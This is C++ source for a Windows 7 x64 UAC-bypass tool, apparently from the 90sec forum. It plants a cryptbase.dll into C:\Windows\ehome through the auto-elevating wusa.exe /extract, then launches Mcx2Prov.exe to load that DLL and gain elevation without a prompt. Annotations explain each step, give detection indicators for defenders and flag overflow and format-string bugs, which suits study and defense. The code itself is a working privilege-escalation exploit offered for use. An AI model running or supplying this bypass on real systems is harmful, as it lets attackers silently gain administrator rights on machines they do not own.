
WIN7 X64 PASSUAC 源码

// Passuac.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include  <direct.h>

BOOL IsUserInAdminGroup()
{
    // Reports whether the account running this process is a member of
    // BUILTIN\Administrators, regardless of whether the process is elevated.
    //
    // On Windows 6.x+ (Vista and later) a UAC-filtered process holds a
    // "limited" token that hides the Administrators membership; in that case
    // the linked (full) token is queried instead. On older systems, or when the
    // token is not limited, an identification-level duplicate of the process
    // token is used so CheckTokenMembership receives an impersonation token.
    //
    // Returns TRUE only when every API call succeeds and the membership check
    // is positive; any failure yields FALSE. Handles opened here are always
    // closed before returning.
    BOOL isMember = FALSE;
    HANDLE procToken = NULL;
    HANDLE tokenToTest = NULL;
    DWORD returned = 0;

    do {
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &procToken)) {
            break;
        }

        OSVERSIONINFO ver = {0};
        ver.dwOSVersionInfoSize = sizeof(ver);
        if (!GetVersionEx(&ver)) {
            break;
        }

        // Vista+ only: a limited (filtered) token's real group membership lives
        // on its linked token.
        if (ver.dwMajorVersion >= 6) {
            TOKEN_ELEVATION_TYPE elevation;
            if (!GetTokenInformation(procToken, TokenElevationType, &elevation, sizeof(elevation), &returned)) {
                break;
            }
            if (elevation == TokenElevationTypeLimited
                && !GetTokenInformation(procToken, TokenLinkedToken, &tokenToTest, sizeof(tokenToTest), &returned)) {
                break;
            }
        }

        // No linked token obtained: fall back to an identification-level copy
        // of the process token.
        if (tokenToTest == NULL
            && !DuplicateToken(procToken, SecurityIdentification, &tokenToTest)) {
            break;
        }

        BYTE adminSid[SECURITY_MAX_SID_SIZE];
        returned = sizeof(adminSid);
        if (CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSid, &returned)) {
            // A failed CheckTokenMembership leaves isMember at its prior value,
            // exactly as the goto-based original did.
            CheckTokenMembership(tokenToTest, &adminSid, &isMember);
        }
    } while (0);

    if (procToken) CloseHandle(procToken);
    if (tokenToTest) CloseHandle(tokenToTest);
    return isMember;
}

BOOL IsRunAsAdmin()
{
    // Reports whether the calling thread's current token is *effectively*
    // a member of BUILTIN\Administrators, i.e. whether the process is running
    // elevated. Unlike IsUserInAdminGroup this looks at the token as-is, so a
    // UAC-filtered administrator gets FALSE here.
    //
    // Returns TRUE only when the SID is built and CheckTokenMembership reports
    // membership; any API failure yields FALSE. The Win32 error code is captured
    // for parity with the original but is not surfaced to the caller.
    BOOL elevated = FALSE;
    DWORD lastErr = ERROR_SUCCESS;
    PSID adminsGroup = NULL;
    SID_IDENTIFIER_AUTHORITY ntAuth = SECURITY_NT_AUTHORITY;

    // S-1-5-32-544: BUILTIN\Administrators.
    BOOL haveSid = AllocateAndInitializeSid(&ntAuth,
                                            2,
                                            SECURITY_BUILTIN_DOMAIN_RID,
                                            DOMAIN_ALIAS_RID_ADMINS,
                                            0, 0, 0, 0, 0, 0,
                                            &adminsGroup);
    if (!haveSid) {
        lastErr = GetLastError();
    } else if (!CheckTokenMembership(NULL, adminsGroup, &elevated)) {
        // NULL token == the caller's current (impersonation or primary) token.
        lastErr = GetLastError();
    }
    (void)lastErr;

    if (adminsGroup) FreeSid(adminsGroup);
    return elevated;
}

BOOL writedll64()
{
// Stage 1 of the bypass: writes the embedded "TESTDLL" resource to disk as
// cryptbase.dll in the current directory, packs it into cryptbase.tmp with
// makecab, then asks wusa.exe to /extract that .cab into C:\Windows\ehome\.
// main() later starts Mcx2Prov.exe from that directory, so this is the
// DLL-planting step (wusa.exe is an auto-elevating binary on Windows 7; the
// /extract switch is no longer available on Windows 10).
//
// Defender notes: a non-elevated process launching wusa.exe with "/extract:"
// pointing under C:\Windows\, or a file named cryptbase.dll being created in
// C:\Windows\ehome\, are high-signal indicators of this technique.
//
// Returns 0 only when the local cryptbase.dll cannot be created; otherwise
// returns true. Nothing after CreateFileA is checked (FindResource,
// LoadResource, WriteFile, system, ShellExecuteA), so a true return does NOT
// mean the extraction actually succeeded.

char Szpath[MAX_PATH] = {0};    // cwd + "\cryptbase.tmp" (absolute path of the cab)
char uacexqute[1024] = {0};     // argument string passed to wusa.exe
DWORD   dwWrite=0;              // bytes written by WriteFile (never compared with dwSize)
WORD wResID;                    // unused
// FILE_SHARE_WRITE allows another process to write the file while it is open here.
HANDLE  hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
// GetLastError() is a DWORD; "%d" is the wrong specifier (should be %lu).
printf("Getlasterror:%d.\r\n",GetLastError());
return 0;
}
// IDR_TESTDLL1 comes from a resource header that is not part of this listing.
// hrsc is not checked for NULL before being handed to LoadResource/SizeofResource.
HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
HGLOBAL hG = LoadResource(NULL, hrsc);
DWORD   dwSize = SizeofResource( NULL,  hrsc);

// hG (the HGLOBAL) is used directly as the data pointer; LockResource is the
// documented way to obtain it. Return value and dwWrite are ignored.
WriteFile(hFile,hG,dwSize,&dwWrite,NULL);
CloseHandle( hFile );

// Build the absolute path of the cab. getcwd's return is unchecked; a long cwd
// plus the 15-char suffix can overrun Szpath (MAX_PATH).
getcwd(Szpath, MAX_PATH);
strcat(Szpath,"\\cryptbase.tmp");
// Runs through the shell with relative names, so it depends on the cwd and on
// makecab being on PATH. Return value ignored.
system("makecab cryptbase.dll cryptbase.tmp");
sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);

// The auto-elevation step: wusa.exe extracts the cab into a protected directory
// without a UAC prompt. Result is not checked.
ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);

//remove("cryptbase*");
// Remove the local staging copies; the extracted copy in ehome is left in place.
// These run immediately after ShellExecuteA without waiting for wusa.exe, so
// the .tmp may be deleted before wusa.exe has read it (presumably racy).
DeleteFileA("cryptbase.dll");
DeleteFileA("cryptbase.tmp");

return true;
}

int main(int argc,char* argv[])
{
// Entry point. argv[1] selects the stage:
//   "passuac"      -> stage 1: plant cryptbase.dll into C:\Windows\ehome via writedll64().
//   anything else  -> stage 2: start C:\windows\ehome\Mcx2Prov.exe (auto-elevating)
//                     with argv[1] quoted as its argument, wait 4 s, then print
//                     c:\programdata\uac.txt. That file is presumably written by the
//                     planted DLL, which is not part of this listing (the page text
//                     says it must be written separately).
// Both stages run only when the user is in the Administrators group but the
// process is not already elevated (a UAC-filtered token).
//
// Defender notes: Mcx2Prov.exe being started by a non-elevated console process,
// or c:\programdata\uac.txt being created, are useful detection points for this
// tool; cryptbase.dll appearing in C:\Windows\ehome\ is the persistent artefact.
//
// Returns 0 in every path except the non-admin case, which calls exit(1).
FILE* fp;
char szcmd[1024] = {0};        // copy of argv[1]
char *Options;                 // unused
char buffer[2048] = {0};       // line buffer for uac.txt
STARTUPINFO si={sizeof(si)};   // si and pi are set up but never used (no CreateProcess call)
PROCESS_INFORMATION pi;
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=TRUE;           // TRUE == 1 == SW_SHOWNORMAL; works by coincidence

if (argc < 2)
{
// Usage banner ("Setp" is a typo for "Step" in the original strings).
printf("[*]:%s Passuac for windows 7 x64\n",argv[0]);
printf("[*]:%s Setp1: passuac\r\n",argv[0]);
printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]);
printf("[*]:Welcome to www.90sec.org\r\n");
printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");
return 0;
}

// BUG: unbounded copy of argv[1] into a 1024-byte buffer; a longer argument
// overruns szcmd. snprintf(szcmd, sizeof szcmd, "%s", argv[1]) would bound it.
strcpy(szcmd,argv[1]);

char szNewCmd[MAX_PATH] = {0};
// BUG: szcmd (up to 1023 chars) is quoted into a MAX_PATH (260-byte) buffer and
// wsprintfA takes no size, so a long argv[1] overruns szNewCmd as well.
wsprintfA(szNewCmd, "\"%s\"", szcmd);

if (!IsUserInAdminGroup())
{
printf("Your not have in Local Administrator Group\r\n");
printf("Program exit;");
exit(1);
}else
{
printf("Your have in Local Administrator Group\r\n");
printf("PassUac ing.....\r\n");
// Only a filtered (non-elevated) admin token needs the bypass; an already
// elevated process silently does nothing.
if (!IsRunAsAdmin())
{
if (!strcmp(szcmd,"passuac"))
{
// Stage 1. writedll64's return value is ignored.
writedll64();
}else
{

// Stage 2: Mcx2Prov.exe is launched from ehome so it picks up the planted
// cryptbase.dll next to it (inferred from writedll64's target directory).
// The hard-coded "C:\windows" drive and path are assumed, not queried.
ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
// Fixed 4 s wait instead of synchronising on the child; the file may not
// exist yet on a slow machine.
Sleep(4000);

fp = fopen("c:\\programdata\\uac.txt","rb");
if (fp == NULL)
{
// fopen reports failures via errno, not the Win32 last-error code, so this
// GetLastError() value is unrelated to the fopen failure (and "%d" mismatches DWORD).
printf("Getlasterror:%d\r\n",GetLastError());
return 0;
}

ZeroMemory(buffer,sizeof(buffer));

while (fgets(buffer,sizeof(buffer),fp))
{
// BUG (format string): the file's contents are passed as the printf format,
// so any '%' sequences in uac.txt are interpreted. Use fputs(buffer, stdout).
printf(buffer);
}
fclose(fp);
}
}
}
return 0;
}


需要自己写一个 DLL 来进行参数解析，请看代码吧。

代码写得相当烂，但是能够达到目的，还请各位莫笑话。